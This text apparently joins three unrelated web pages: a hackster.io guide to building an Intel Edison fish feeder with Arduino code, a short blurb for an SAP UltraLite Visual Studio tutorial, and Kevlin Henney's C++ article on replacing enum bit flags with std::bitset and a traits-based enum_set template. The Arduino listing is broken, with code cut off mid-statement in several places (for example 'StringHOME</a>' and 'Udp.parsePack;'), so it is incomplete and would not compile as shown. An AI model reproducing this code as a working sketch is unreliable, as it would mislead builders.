Edison Arduino breakout board) Difficulty: Hard (9/10) Skills Required: - Programming with Arduino (and general programming know-how) - Using Linux Command Line (even a little experience is sufficient) - Electronics - Making stuff out of paper and cardboard (strong sturdy stuff, not art and craft) Materials For Electronics: - Intel Edison Arduino Breakout Board - 1 standard servo motor - 1 micro servo motor - 16x2 alphanumeric LCD screen - Breadboard shield - 2N2222 transistors (2) - Buzzer - Jumper wire - WiFi antenna (optional) Materials for Stand: - Mountboard (white cardboard) - Firm double layer cardboard - Ice cream sticks - PVA glue - Superglue - Small nail - Double Tape - 2 part adhesive (like Araldite or Bondtite) Step 8: 11: Attach The Servo To The Lid... Attach a strong piece of string to the Micro Servo Motor and fix it just behind the lid's hinge (as shown above). I've used super strong 2 part adhesive which is way cleaner than nasty doubletape. After the glue dries, stick the other end of the string to the lid (see 1st picture) with a combination of insulation tape and super strong adhesive (see picture 3). Step 12: Prepare The Intel Edison... Prerequisites: Before continuing with this project, you should have done the following for thee Edison: - Installed all drivers on the computer - Installed the Arduino IDE - Flashed linux image onto the Edison. - Established a serial connection with the Edison and connected it to WiFi - Downloaded Putty and WinSCP After following these basic getting started instructions, be sure to follow the following steps if you haven't already: - Open a serial connection with the Edison using Putty. - Enter this command: vi /etc/opkg/base-feeds.conf - Now type in: src/gz all src/gz edison src/gz core2-32 - Now hit the escape key and type :wq - Type in opkg update. - Yay thats done! You can install many programs, like nano (a much more user friendly test editor that vi). Just run opkg install nano and it should download and install on its own. This page helped me with getting these instructions. Step 13: Prepare The LCD Screen... I simply connected a bunch of jumper wires to the required pins of the LCD screen. On the other ends of the wires I soldered on make headers (see pic above) so that they'd easily connect to the headers on the Edison breakout board). Note: Be sure to mark which wire is which in order to avoid confusion later on! Wires to be connected to Edison: D4, D5, D6, D7, RS, E (aka enable pin) [leave one end of these unconnected for now!] Other connections: - R/W pin to ground. - 1K resistor resistor between VEE (also labeled V0 sometimes) and ground - LED+ to +5V through 220ohm resistor - LED- to ground. Step 14: The Circuit... Now to the fun part - the circuit. The circuit consists of: - 2 Transistors, controlling the servo motors' signal - A buzzer. - An alphanumeric LCD screen (the green made-in-china ones) I've arranged my circuit on a home-made breadboard shield, though you use a plain old half breadboard from SparkFun. Follow the pictures above to make the circuit... Note that the motors only have to be connected later on... Step 15: Arduino Code + some more programming... The Arduino code is long. 800+ lines of code for me is flabbergasting! Anyway, the zipped folder is available below. Simply download it, unzip it and open it with the Arduino IDE. Before uploading to the Edison, follow these instructions: - Open a connection to the Edison using WinSCP. - Right click and create a file named "arduino" - In the file, enter this - 12,30,0,19,0,0,22,51,22,19,0,0,6,0,0 - Now save this file. - Make another file called "text.htm" and insert the text from the file below called "text.htm": Also, go the the line before void setup() where the WiFi ssid and password have been declared. Changed these according to your network, and then upload the Arduino sketch to the Edison. Go on to the next step to test AquaFeeder! Download the zipped Arduino code here! Step 16: How The Arduino Code Works... Most of you wouldn't want to go through the entire code to try and figure out how it works and where each section of code, especially because there are 800+ lines of code (a LOT for a noob like me). So here is a brief of the execution of the Arduino code of AquaFeeder2.0: void setup(){ //the setup part is run only once, immediately after the program begins - Begin serial connection at 115200 baud - Begin LCD and show AquaFeeder2.0 splash screen - Attempt to connect to WiFi network - Begin a server on port 88 - Show details of WiFi on LCD and Serial port - Obtain web time using NTP - Get variables like feeding times, previous time fed etc. from "arduino" text file under /home/root/ on the Edison. - Check if any feeding time has been missed, and if it has, then start feeding the fish - Figure out the time to feed next - Set servo motors to their initial position } void loop(){ //the loop runs over and over again after the setup() - Listen for web clients (meaning, be ready to create a webpage when someone requests it from a browser on their computer - Display different information on the lcd alternatively; Current time and IP address, then next time to feed and previous time fed every few seconds - Attempt to get web synced time if it failed to do so - Compare current time and feeding times and determine if it is time to feed the fish - If it is time to feed the fish, carry out the feeding the fish with the function feedfish(); } void feedfish(){ //A function which includes all activities carried out when time to feed - Create a sound with the buzzer - Show "Opening Lid" on LCD and start opening lid using servo motor on pin 3 - Rotate the feeding servo (connected to pin 2) halfway to shake the fish food container so that fish food falls into the water - Rotate the feeding servo motor back into the initial position - Use the lid servo to close the lid - Update previously fed and next to feed times - Send email with necessary information - Update the file "arduino" under /home/root/ on the Edison Step 17: Testing Edison (without attaching motors... yet) Checking if LCD works and Edison connects to WiFi: Open the serial port on the Arduino IDE. After the sketch uploads, you should see the LCD display show "AquaFeeder" along with a loading sign. After that it would attempt to connect to your WiFi network (so be sure that your router is always on!). If it connects successfully, the LCD would display the Edison's IP address, while the serial port will show other WiFi details like signal strength. Checking if Edison successfully gets web synced time and obtains variables from "arduino" text file. Now, the Edison will make an attempt to get the time from the NTP server. If it does successfully, it will send the current time to the Serial port and display it on the LCD. The Edison will then open the "arduino" file (which we made earlier) and read the number variables off it, then determine the feeding times, previous time fed, previous day fed etc. After all this happens, the Edison will go through the main loop(); the LCD will switch through showing the current time and IP address or next time to feed and previous time fed every few seconds. On the serial you should see the message "Listening to clients". This refers to the Edison's webpage. Testing Edison's webpage: Now, on your computer, type in :88/h. For example if the Edison's IP address is 192.168.1.12, type in 192.168.1.12:88/h. Look at the Serial port now. You should see the message "GOT CLIENT!" and some other messages after that. On your browser, you should see a webpage load that looks like this: Step 18: Making An Enclosure... I'm lazy, unimaginative, out-of-time and lack a 3D printer, so I had to end up with an enclosure made from the box the Intel Edison came in. Well at least the box looks better than the origami box I tried making earlier (which failed MISERABLY), and I can still use it to store my Edison if I like. How you cut up your box is up to you; just keep in mind that the headers should be accessible and preferably the USB and DC connectors too. Step 19: Connect The Servos... It's time to move the AquaFeeder stand to the aquarium! I had to extend the servo wires so that it could reach the Edison that was placed at the base of the stand. To connect the servo motors, see the Fritzing diagram above. Step 20: Connect to Power and Test! I used a 12V adaptor to power my Edison through the DC power jack. After the Edison is powered up and the LCD is showing the time/IP address (i.e its in the main loop sequence), connect to the Edison's webpage (see Step 17). Click on the feed now link. After a few moments, you should here a few beeps, and some messages on the serial port that indicate that AquaFeeder is going to start feeding the fish. AquaFeeder will first start opening the lid, while the LCD shows "Opening Lid". Then the other servo motor will rotate and jerk a bit and then return to its initial position. After that, the lid will be closed. Check your connections if either or both servos are not working! After the feeding algorithm is completed, the LCD must show the previous time fed correctly too. Also in your browser, hit the back button to prevent running the feeding algorithm again! Step 21: Finished! If all tests worked great, you can now attach the fish food container to the feeding servo as shown above. And AquaFeeder is finished! All you have to do is leave it on the entire day, and it'll take care of the rest! Schematics Code Code snippet #1Plain text src/gz all src/gz edison src/gz core2-32 Code snippet #2Plain text //WiFI variablesint status = WL_IDLE_STATUS; char ssid[] = "your network name"; //your network SSID (name) char pass[] = "your*network*pass****"; // your network password WiFiServer server(88); AquaFeeder2.inoArduino //#include <Wire.h> #include <LiquidCrystal.h> #include <Time.h> #include <WiFi.h> #include <WiFiUdp.h> #include "textreader.c" #include <SoftwareServo.h> //#include <Intel_Edison_BT_SPP.h> LiquidCrystal lcd(6, 7, 8, 9, 10, 11); SoftwareServo myservo1; //servo that drops food SoftwareServo myservo2; //lid servo byte pos, posx, cent; int spin1 = 4; //feed servo int spin2 = 5; //lid servo int buzz = A4; #define TXT_BUF_SZ 50 #define REQ_BUF_SZ 90 char txt_buf[TXT_BUF_SZ] = {0}; // buffer to save text to char HTTP_req[REQ_BUF_SZ] = {0}; // buffered HTTP request stored as null terminated string char req_index = 0; // index into HTTP_req buffer char * str; char * str1; byte commaindex[15]; String txtval[15]; StringHOME</a> "); client.print("<a href=\"settime.htm\">SetTimes</a></font><br><br>"); client.print("<font size = 3>AquaFeeder is running OK. Here are the details. To change feeding times, click 'SetTimes' above.</font>"); client.print("<br><br><font size = 3><strong> Current time: </strong>"); client.print(String(printtime(hour()))); client.print(":"); client.print(String(printtime(minute()))); client.print("<br> <strong>Previously fed at: </strong>"); client.print(String(printtime(prevtime[0]))); client.print(":"); client.print(String(printtime(prevtime[1]))); client.print("<br> <strong>Next time to feed: </strong>"); client.print(String(printtime(nexttime[0]))); client.print(":"); client.print(String(printtime(nexttime[1]))); client.print("<br><br><strong>Feedtime 1: </strong>"); client.print(String(printtime(feedtime1[0]))); client.print(":"); client.print(String(printtime(feedtime1[1]))); client.print("<br><strong>Feedtime 2: </strong>"); client.print(String(printtime(feedtime2[0]))); client.print(":"); client.print(String(printtime(feedtime2[1]))); client.print("<br></font><br><font size = 5>Click <a href=\"/H\">here</a> to feed <i>now!</i></font><br>"); client.print("<br> <a href = \"off.htm\">Turn off Edison</a>"); } else if (StrContains(HTTP_req, "GET /settime.htm")) { Serial.println("set page"); str1 = readhtmFile(); Serial.println(str1); client.write(str1); delay(1000); } else if (StrContains(HTTP_req, "GET /off.htm")) { Serial.println("Switching off"); system("shutdown now"); } if (StrContains(HTTP_req, "ajax_inputs")) { Serial.println("ajax inputs"); if (GetText(txt_buf, TXT_BUF_SZ)) { Serial.println("\r\nReceived Text:"); webmsg = txt_buf; Serial.println(webmsg); commaindex[0] = webmsg.indexOf(','); txtval[0] = webmsg.substring(0, commaindex[0]); Serial.println(txtval[0].toInt()); for (int l = 1; l < 15; l++) { txtval[l] = 0; } for (int l = 1; l < 4; l++) { commaindex[l] = webmsg.indexOf(',', commaindex[(l - 1)] + 1); txtval[l] = webmsg.substring(commaindex[(l - 1)] + 1, commaindex[l]); Serial.println((txtval[l].toInt())); } feedtime1[0] = txtval[0].toInt(); feedtime1[1] = txtval[1].toInt(); feedtime1[2] = 0; feedtime2[0] = txtval[2].toInt(); feedtime2[1] = txtval[3].toInt(); feedtime2[2] = 0; Serial.println("updated feedtimes"); for (e = 0; e < 3; e++) { Serial.println(feedtime1[e]); Serial.println(feedtime2[e]); } delay(1000); getnexttime(); lcd.clear(); lcd.print("Updated times"); delay(300); } } req_index = 0; StrClear(HTTP_req, REQ_BUF_SZ); client.println(); Serial.println("DONE lient printinin"); delay(20); client.stop(); Serial.println("client disconnected"); break; } else { // if you got a newline, then clear currentLine: currentline = ""; } } else if (c != '\r') { // if you got anything else but a carriage return character, currentline += c; // add it to the end of the currentLine } if (currentline.endsWith("GET /H")) { Serial.println("got link message"); // GET /H turns the LED on tone(buzz, 100, 300); feednow = true; } } else { e += 1; Serial.println(e); if (e > 503) { //maybe not required client.stop(); Serial.println("client disconnected"); Serial.println(currentline); break; } } } delay(700); } }; } //; } void lcddisplay() { if (millis() - last > 4000) { i = !i; if (i == true) { lcd.clear(); lcd.print("Time: "); lcd.print(printtime(hour())); lcd.print(":"); lcd.print(printtime(minute())); lcd.setCursor(0, 1); if (WiFi.status() == WL_DISCONNECTED || WiFi.status() == WL_CONNECT_FAILED) { lcd.print("Not Connected"); } else { lcd.print(WiFi.localIP()); } delay(100); } else if (i == false) { lcd.clear(); lcd.print("Next: "); lcd.print(printtime(nexttime[0])); lcd.print(":"); lcd.print(printtime(nexttime[1])); lcd.setCursor(0, 1); lcd.print("Prev: "); lcd.print(printtime(prevtime[0])); lcd.print(":"); lcd.print(printtime(prevtime[1])); delay(100); } last = millis(); } } String printtime(byte v) { static String vv = ""; if (v < 10) { vv = "0"; vv += v; return vv; } else { vv = ""; vv += v; return vv; } } //WiFI and Ntp stuff... void wifibegin() { e = 0; while ( status != WL_CONNECTED) { e++; Serial.println("Connecting"); lcd.clear(); lcd.print("Connecting to:"); delay(1000); lcd.clear(); lcd.print(String(ssid)); lcd.setCursor(0, 1); status = WiFi.begin(ssid, pass); delay(2000); if (e > 3) { lcd.clear(); lcd.print("Failed connecting"); break; } } for (int u = 0; u < 16; u++) { lcd.print("="); delay(20); } lcd.clear(); lcd.print("Connected!"); delay(200); Udp.begin(localPort); } time_t getNTPtime() { lcd.clear(); lcd.print("Getting time.."); sendNTPpacket(timeServer); delay(1000); if ( Udp.parsePack; const unsigned long seventyYears = 2208988800UL; unsigned long epoch = secsSince1900 - seventyYears; return epoch + 19800; //19800 in my case: multiply your timezone by 3600 } lcd.clear(); lcd.print("Success!"); delay(500); } unsigned long sendNTPpacket(IPAddress & address) { memset(packetBuffer, 0, NTP_PACKET_SIZE); // Initialize values needed to form NTP request printWifiStatus() { lcd.clear(); lcd.print("IP Address"); lcd.setCursor(0, 1); lcd.print(WiFi.localIP()); // print the SSID of the network you're attached to: Serial.print("SSID: "); Serial.println(WiFi.SSID()); // print your WiFi shield's IP address: IPAddress ip = WiFi.localIP(); Serial.print("IP Address: "); Serial.println(ip); long rssi = WiFi.RSSI(); Serial.print("signal strength (RSSI):"); Serial.print(rssi); Serial.println(" dBm"); delay(1000); } void checkiffed() { if (day() > prevdate) { if (timecompare(hour(), minute(), second(), feedtime1[0], feedtime1[1], feedtime1[2]) == 2) { if (timecompare(prevtime[0], prevtime[1], prevtime[2], feedtime2[0], feedtime2[1], feedtime2[2]) == 2) { notfed = true; } else { notfed = false; } } else if ( (timecompare(hour(), minute(), second(), feedtime1[0], feedtime1[1], feedtime1[2]) == 1) && (timecompare(hour(), minute(), second(), feedtime2[0], feedtime2[1], feedtime2[2]) == 2)) { notfed == true; } } else if (day() == prevdate) { if (fed2 == false && timecompare(hour(), minute(), second(), feedtime2[0], feedtime2[1], feedtime2[2]) == 1) { notfed = true; } else { notfed = false; } } } void getnexttime() { //less if ( (timecompare(hour(), minute(), second(), feedtime1[0], feedtime1[1], feedtime1[2]) == 2) || (timecompare(hour(), minute(), second(), feedtime2[0], feedtime2[1], feedtime2[2]) == 1)) { nexttime[3] = feedtime1[3]; } else { nexttime[3] = feedtime2[3]; } Serial.println(nexttime[3]); } byte timecompare(int hour1, int minute1, int sec1, int hour2, int minute2, int sec2) { //0 = equal, 1= more, 2 = less if (hour1 == hour2) { if (minute1 == minute2) { return 0; } else if (minute1 > minute2) { return 1; } else if (minute1 < minute2) { return 2; } } else if (hour1 > hour2) { return 1; } else if (hour1 < hour2) { return 2; } } void feedthefish() { //Figure out next time to feed... Serial.println("Feeding..."); if (feednow1() == true) { nexttime[3] = feedtime2[3]; fed1 = true; } else if (feednow2() == true) { nexttime[3] = feedtime1[3]; fed2 = true; } openlid(); putfood(); closelid(); //set prevtime (previously fed time) as the time now... prevtime[0] = hour(); prevtime[1] = minute(); prevtime[2] = second(); //delete later if not required prevdate = day(); //set fed1 fed2 here again?? --waittt updatevartomem(); } void putfood() { lcd.clear(); lcd.print("Putting Food..."); digitalWrite(spin1, HIGH); //food servo for ( pos = 177; pos > 46; pos--) { Serial.println("feeding srvo"); Serial.println(pos); myservo1.write(pos); delay(10); } //shake a bit... myservo1.write(60); delay(300); myservo1.write(40); delay(300); myservo1.write(50); delay(300); myservo1.write(30); delay(300); for (pos = 40; pos < 180; pos++) { myservo1.write(pos); Serial.println(pos); delay(28); } digitalWrite(spin1, LOW); lcd.clear(); lcd.print("DONE!"); delay(1000); } void openlid() { lcd.clear(); lcd.print("Opening Lid..."); digitalWrite(spin2, HIGH); for (posx = 180; posx > 0; posx--) { myservo2.write(posx); // tell servo to go to position in variable 'pos' delay(32); } digitalWrite(spin2, LOW); lcd.clear(); lcd.print("Opened!"); delay(500); } void closelid() { lcd.clear(); lcd.print("Closing Lid."); digitalWrite(spin2, HIGH); for (posx = 1; posx < 180; posx++) { myservo2.write(posx); delay(30); } digitalWrite(spin2, LOW); lcd.clear(); lcd.print("Closed Lid!"); } boolean feednow1() { if ( (timecompare(hour(), minute(), second(), feedtime1[0], feedtime1[1], feedtime1[2]) == 0) && fed1 == false) { return true; } else { return false; } } boolean feednow2() { if ( (timecompare(hour(), minute(), second(), feedtime2[0], feedtime2[1], feedtime2[2]) == 0) && fed2 == false) { return true; } else { return false; } } textreader.cArduino #include <stdio.h> #include <stdlib.h> #include <string.h> #include <malloc.h> char* readardFile (){ FILE *f = fopen("/home/root/arduino", "rb"); if (f != NULL) { fseek(f, 0, SEEK_END); long pos = ftell(f); fseek(f, 0, SEEK_SET); char *bytes = (char*)malloc(pos); fread(bytes, pos, 1, f); fclose(f); return bytes; } else { return NULL; } } char* readhtmFile (){ FILE *f1 = fopen("/home/root/text.htm", "rb"); if (f1 != NULL) { fseek(f1, 0, SEEK_END); long pos1 = ftell(f1); fseek(f1, 0, SEEK_SET); char *bytes1 = (char*)malloc(pos1); fread(bytes1, pos1, 1, f1); fclose(f1); return bytes1; } else { return NULL; } } Credits Replications Did you replicate this project? Share it!I made one Love this project? Think it could be improved? Tell us what you think!
https://www.hackster.io/DangerousTim/aquafeeder-2-0-automatic-fish-feeder-d15e0c?ref=part&ref_id=8232&offset=31
CC-MAIN-2017-34
en
refinedweb
This tutorial guides you through the process of building an UltraLite application for Windows Mobile using Microsoft Visual Studio. It uses the ADO.NET interface provided by the iAnywhere.Data.UltraLite namespace and runs on the .NET 3.5 Compact Framework. This tutorial contains code for a Visual Basic application and a Visual C# application. Lesson 1: Creating a Visual Studio project Lesson 2: Creating an UltraLite database Lesson 3: Connecting to the database Lesson 4: Inserting, updating, and deleting data Lesson 5: Building and deploying the application Code listing for C# tutorial Code listing for Visual Basic tutorial
http://dcx.sap.com/1201/en/uldotnet/dotnet-visual-tutorial.html
CC-MAIN-2017-34
en
refinedweb
Flag Waiving (Application Development Advisor 6(3), Apr enum to manage bit sets works fine in C, but things become a little more complex in C++. Kevlin Henney explains an alternative method of handling flags, using the bitset template Flag waiving Take a quick look at the following code: This brings us to the first bit of laziness to tidy up in the original enum definition. As it happens, the first three values form the sequence 0, 1and 2, which spec- ifies no bits, the first bit and the second bit respec- tively. Each integer power of 2, from 0 up, represents a different bit. To make it clear that the enumerators do not form a conventional sequence, but instead rep- resent bit masks, developers typically set the mask val- ues explicitly. As neither C nor C++ supports binary literals, it is more common to use hexadecimal rather than either decimal or octal to define the constants: typedef enum style { plain, bold, italic, underline = 4, strikethrough = 8, small_caps = 16 } style; What language is it in? It could be C or C++, although the style is clearly C-like; C++ does not need all that typedefnoise to obtain a usable type name. The following code fragments fix the language: enum style { plain, bold = 0x01, italic = 0x02, underline = 0x04, strikethrough = 0x08, small_caps = 0x10 }; style selected = plain; ... selected |= italic; ... if(selected & bold) ... Since the aim of this column is to reconsider how we work with flags in C++, I have also taken the small liberty of dropping the C-ish typedef. Let’s look at another common approach to specifying the enu- merators, that makes the basic idea of sequence (bit 0, bit 1, bit 2 etc) a little more explicit: It’s C. To be precise, it’s common but not particu- larly good C. The code demonstrates a weakness of the type system that encourages sloppy design. Unfortu- nately, given the enduring C influence on C++ cod- ing practices, this style for flags and sets of flags is also prevalent in C++. C++ programmers without a C background can acquire these habits by osmosis fromtheir C-speaking colleagues or through C-influ- enced libraries. enum style { plain, bold = 1 << 0, italic = 1 << 1, underline = 1 << 2, strikethrough = 1 << 3, Flag poll First, some quick explanation and a little bit of reformatting. As its name suggests, an enum is nor- mally used to enumerate a set of constants. By default, the enumerators have distinct values, starting at 0 and rising by 1 for each successive enumerator. Alterna- tively, an enumerator can be given a specific constant integer value. A common approach for holding a set of binary optionsis to treat an integer value as a collection of bits, ignoring its numeric properties. If a bit at a particular position is set, the option represented by that position is enabled. This duality is common at the systems pro- gramming level and many programmers never think to question it. C programmers and, indeed, C com- pilers make little distinction between enumerators, integers, flags and bit sets. An enum is often used to list the distinct options in a bit set, but instead of acting as distinct symbols, enumerator constants are used to represent bit masks. FACTS AT A GLANCE G C habits still affect C++ style,such as how to work with flags. G C++’s stronger type checking makes the C use of enums as bit sets somewhat awkward. G The standard library’s bitset template provides a simpler and more direct implementation for sets of flag options. G Programmers can define their own types for holding bit sets based on std::bitset. G Trait classes and policy parameters allow for flexible implementation. Kevlin Henney is an independent software development consultant and trainer.He can be reached at 56 APPLICATION DEVELOPMENT ADVISOR G small_caps = 1 << 4 a stylevariable to hold not an option but a set of options. While the bit representation of an enum affords such usage, it is by default a type error that is fundamentally a category error: a thing and a collection of things are different types. This answers the question of why plain is not really a valid enu- merator for style. It represents a combination of options (or, rather, their absence); it is a set rather than an individual option. The canon- ical C type for a bit set is the integer, signed or otherwise, but the C’s lax type system allows the free and easy mixing of unrelated concepts. Here is the revised code: }; This approach makes the bit-masking purpose of the enumera- tors a little clearer. The relationship to integers and ordinary count- ing numbers is less interesting than the shifted position of a set bit. But what about the code that shows how the styleflags are used? Alas, the following won’t compile: selected |= italic; This fails because enumand integer types are not interchangeable: arithmetic and bitwise operators do not apply to enums. When you use an enumwhere an integer is expected, you get an implicit con- version to the enum’s associated integer value, in effect: const unsigned plain = 0; ... unsigned selected = plain; ... selected |= italic; ... if(selected & bold) ... static_cast<int>(selected) |= static_cast<int>(italic); When integers go bad While there is not much wrong with using an enum as an inte- ger, there is plenty wrong with using an integer as an enum. Every enumerator will map to a valid integer value but not every valid integer will map to a valid enumerator. That’s why C++ banned the implicit conversion from integer to enum and why the code shown won’t compile. So how do you make it compile? You can force the compiler to succumb to your wicked way with a cast as your accomplice: However, what the other approaches lacked in grace, the inte- gerbit set loses in safety and precision. There is nothing that constrains the actual use of an unsigned to be the same as its intended use. Taking a step back from these many variations, you may realise the nagging truth: it’s all a bit of a hack. Why should you be man- ually organising your constants according to bit masks at all? It is easy to become rooted in only one form of thinking. Sometimes a fresh look will help you break out of a rut to a more appropriate solution. Let’s leave C behind. It’s time to get back to basics, ignoring all this bitwise gymnas- tics, and restate the core problem: you need to hold a set of options, each of which is effectively Boolean. This suggests a simple solution: hold a set of options. selected = static_cast<style>(selected | italic); It would be fair to say this lacks both grace and convenience. Alternatively, you could overload the bitwise or operators to do yourbidding: style operator|(style lhs, style rhs) { return static_cast<style>(int(lhs) | int(rhs)); } enum style { bold, italic, underline, strikethrough, small_caps }; ... std::set<style> selected; ... selected.insert(italic); ... if(selected.count(bold)) ... style &operator|=(style &lhs, style rhs) { return lhs = lhs | rhs; } This will allow the code to compile in its original form, but you should not forget to define the other relevant bitwise operators. One problem with this approach is that you need to define these operators anew for every enumtype you want to use as a bit set. And what do you do for the definition of the bitwise notoperator? This is used to ensure that a bit is disabled: This method is a lot simpler to work with: the style type sim- ply enumerates the options with no hard coding of literal values. The standard set class template allows a set of options to be manipulated as a type-checked set rather than at the systems programming level. In other words, the language and library do all the work for you. selected &= ~italic; What should the value of ~italicbe? bold | underline | strikethrough | small_caps or ~int(italic)? The former includes only bits that have been defined as valid for the bit set, but the latter is a simpler interpretation of the bit set concept. A quick aside on cast style: the constructor-like form, eg int(italic) is used where the conversion is safe and would otherwise be implicit. You are constructing an intfrom a style. The keyword cast form, static_cast, is being used where the conversion is potentially unsafe and we are taking liberties with the type system. Which brings us neatly to the next point: we are messing with the type system. There is an underlying reason why we are having to perform with a cast of thousands: the design is flawed. If you recall, the style type is an enumeration type. In other words, it enumerates the intended legal values of a style variable that is designed to hold one of the enumerator values at a time. However, the common practice uses Honing for efficiency Functionally, there are no problems with this approach, but many programmers may justifiably have concerns over its efficiency. The bitwise solution required an integer for storage, no additional dynamic memory usage, and efficient, fixed-time manipulation of the options. In contrast, an std::set is an associative node-based container that uses dynamic memory for its representation. If you hold these space and time efficiency concerns (and have good reason to), all is not lost: you can still have abstraction and efficiency. The flat_set class template presented in the last column1 is an improvement over std::set for this purpose. But better still is the standard bitset template: APRIL 2002 57 std::bitset<5> selected; ... selected.set(italic); ... if(selected.test(bold)) ... enum_set<style, _style_size> selected; This is clumsy and smacks of redundancy. We state the type and then a property of the type, relying in this case on a little hack to keep everything in sync. It would be nice to look up the relevant type properties based on the type name, so that the type is all the user has to specify in a declaration. C++’s reflective capabilities are quite narrow, limited to runtime-type information in the form of typeidand dynamic_castand compile-time type information in the form of sizeof. However, the traits technique2, first used in the C++ standard library, offers a simple form of customisable compile-time type information. It is a myth that classes exist only to act as the DNA for objects. Classes can be used to group non-instance information in the form of constants, types or staticmember functions, describing policiesor other types. A class template can be used to describe properties that relate to its parameters, specialising as necessary. This form of compile-time lookup allows us to answer neatly the question of the bitset’s size: The std::bitsetclass template, defined in the standard <bitset> header, is not a part of the STL, hence the seemingly non-standard member function names. But it is still standard and it still solves the problem. A more legitimate obstacle is that the size of the set must be wired in at compile time. There is also nothing that constrains you to working with the style type. There is a simple hack that allows you to avoid having to count the number of enumerators: enum style { bold, italic, underline, strikethrough, small_caps, _style_size }; ... std::bitset<_style_size> selected; ... template<typename enum_type> class enum_set { ... private: typedef enum_traits<enum_type> traits; std::bitset<traits::count> bits; }; I say this is a hack because you are using the property of enumerators to count, by default, in steps of 1 from 0. The last enumerator, _style_size, is not really part of the valid set of enumerators because it does not represent an option. However, in its favour, this technique does save you from many of the ravages of change: the addition or removal of enumerators and any consequent change to the declared size of the bitset. Producing a rabbit with style However, there is no such thing as magic. If you wish to pull a rabbit out of a hat, you had better have a rabbit somewhere to hand.Here is a definition of what the traits for the style type would look like: Rhyme and treason Now I think we have a better idea of what is needed: something that works like a type-safe bitsetfor enums. Alas, we won’t find one of thesein the standard so we will have to create it. Let’s start with the intended usage: template<> struct enum_traits<style> { typedef style enum_type; static const bool is_specialized = true; static const style first = bold; static const style last = small_caps; static const int step = 1; static const std::size_t count = last - first + 1; }; enum_set<style> selected; ... selected.set(italic); ... if(selected.test(bold)) ... It seems reasonable enough to follow the std::bitset interface because the two are conceptually related. Additionally, a const subscript operator would make its use even more intuitive: It is common to use structrather than classfor traits because they do not represent the type of encapsulated objects, and a private-public distinction serves no useful purpose. The trait class just shown is a full specialisation of the primary template, which is effectively just a shell with non-functional placeholder values: if(selected[bold]) ... template<typename type> struct enum_traits { typedef type enum_type; static const bool is_specialized = false; static const style first = type(); static const style last = type(); static const int step = 0; static const std::size_t count = 0; }; To save on all the bit twiddling, we can use std::bitset as the representation of our enum_set. However, a quick sketch reveals aproblem: template<typename enum_type> class enum_set { ... private: std::bitset<???> bits; }; The information available to an enum_traitsuser includes the type of the enum; whether or not the trait is valid (has been specialised); the first and last enumerator values; the step increment, if any, between How big should the bitsetbe? One unsatisfactory solution would be to require the user to provide the size as well as the type, ie: 58 APPLICATION DEVELOPMENT ADVISOR G std::size_t count() const { return bits.count(); } std::size_t size() const { return bits.size(); } bool operator[](enum_type testing) const { return bits.test(to_bit(testing)); } enum_set &set() { bits.set(); return *this; } enum_set &set(enum_type setting, bool value = true) { bits.set(to_bit(setting), value); return *this; } enum_set &reset() { bits.reset(); return *this; } enum_set &reset(enum_type resetting) { bits.reset(to_bit(resetting)); return *this; } enum_set &flip() { bits.flip(); return *this; } enum_set &flip(enum_type flipping) { bits.flip(to_bit(flipping)); return *this; } enum_set operator~() const { return enum_set(*this).flip(); } bool any() const { return bits.any(); } bool none() const { return bits.none(); } ... private: typedef enum_traits<enum_type> traits; static std::size_t to_bit(enum_type value) { return (value - traits::first) / traits::step; } std::bitset<traits::count> bits; }; each enumerator; and the count of the enumerators. This is all good information to have but it does seem like a lot of work: a separate specialisation is required for each enumtype. Fortunately, we can provide a helper class to cover most of this ground: template< typename type, type last_value, type first_value = type(), int step_value = 1> struct enum_traiter { typedef type enum_type; static const bool is_specialized = true; static const type first = first_value; static const type last = last_value; static const int step = step_value; static const std::size_t count = (last - first) / step + 1; }; The enum_traitertemplate is designed for use as a base, reducing the enum_traits specialisation for style: template<> struct enum_traits<style> : enum_traiter<style, small_caps> { }; This makes life a lot easier, and accommodates enumtypes whose enumerators do not number from 0 and whose step is not 1. However, the common case is catered for with default template parameters, remembering that the explicit default construction for integers and enums is zero initialisation. Wrapping and forwarding The implementation for enum_set becomes a fairly simple matter of wrapping and forwarding to a std::bitset: template<typename enum_type> class enum_set { public: enum_set() { } enum_set(enum_type setting) { set(setting); } enum_set &operator&=(const enum_set &rhs) { bits &= rhs.bits; return *this; } enum_set &operator|=(const enum_set &rhs) { bits |= rhs.bits; return *this; } enum_set &operator^=(const enum_set &rhs) { bits ^= rhs.bits; return *this; } APRIL 2002 59 ... often forgotten. Taking the opportunity to call into question certain C bit bashing tactics leads to the identification of new abstractions which, once implemented, reduce the density and quantity of code needed to express what are in essence high-level ideas. There is no need to jump through hoops when using the abstractions, although their implementation does call on some relatively advanced idioms. How far could you take the use of enum_traits? It is possible to extend it to accommodate existing enum types that are defined in terms of a bit-shifted progression rather than an arithmetic one. Based on traits, you can also define iteration for enum types. For the moment, these are left as exercises for the reader. I There is one final tweak that, for no extra hassle, makes the code a little more generic. A common use of trait classes in the standard library is as policy parameters. The default is to use the default trait for a type, but the user could provide an alternative. The use of policies is a long-standing C++ te chnique that has mature d ove r the last de cade3,4,5,6,7. The only difference to the enum_set template would be to remove the traits typedef and add a defaulted parameter: template< typename enum_type, typename traits = enum_traits<enum_type> > class enum_set { ... }; References 1. Kevlin Henney, “Bound and Checked”, Application De ve lopme nt Advis or, January 2002, available from 2. Nathan Myers, “Traits: A new and useful template technique”, C++ Re port, June 1995, available from 3. Andrei Alexandrescu, Mode rn C++ De s ign, Addison-Wesley, 2001 4. Grady Booch, Obje ct-Orie nte d Analys is and De s ign with Applications , 2nd edition, Benjamin/Cummings, 1994 5. Erich Gamma, Richard Helm, Ralph Johnson and John Vlissides, De s ign Patte rns , Addison-Wesley, 1995 6. Kevlin Henney, “Making an Exception”, Application De ve lopme nt Advis or, May 2001, available from 7. Bjarne Stroustrup, The De s ign and Evolution of C++, Addison-Wesley, 1994 This facility can be used to define sets on a subset of options: struct simple_style : enum_traiter<style, underline> { }; ... enum_set<style, simple_style> selected; ... This declaration of selected allows it to hold only bold, italic and underline options. Looking to the standard library can be a good way of finding either a solution or the inspiration for one. There are a lot of programming tasks that are repetitive and tedious. Because of their repetitive nature they become part of the background hum of programming, ADA's free e-mail newsletter for software developers By now many of you will have had a free on-line newsletter which is a service to readers of ADA and packed with the very latest editorial for software and application developers. However, some of our readers don't get this free service. If you don't get your free newsletter it's for one of two good reasons. Even though you subscribed to ADA, you haven't supplied us with your e-mail address. b You ticked the privacy box at the time you subscribed and we can't now send you our newsletter. c
http://www.slideserve.com/Kevlin/flag-waiving
CC-MAIN-2017-34
en
refinedweb
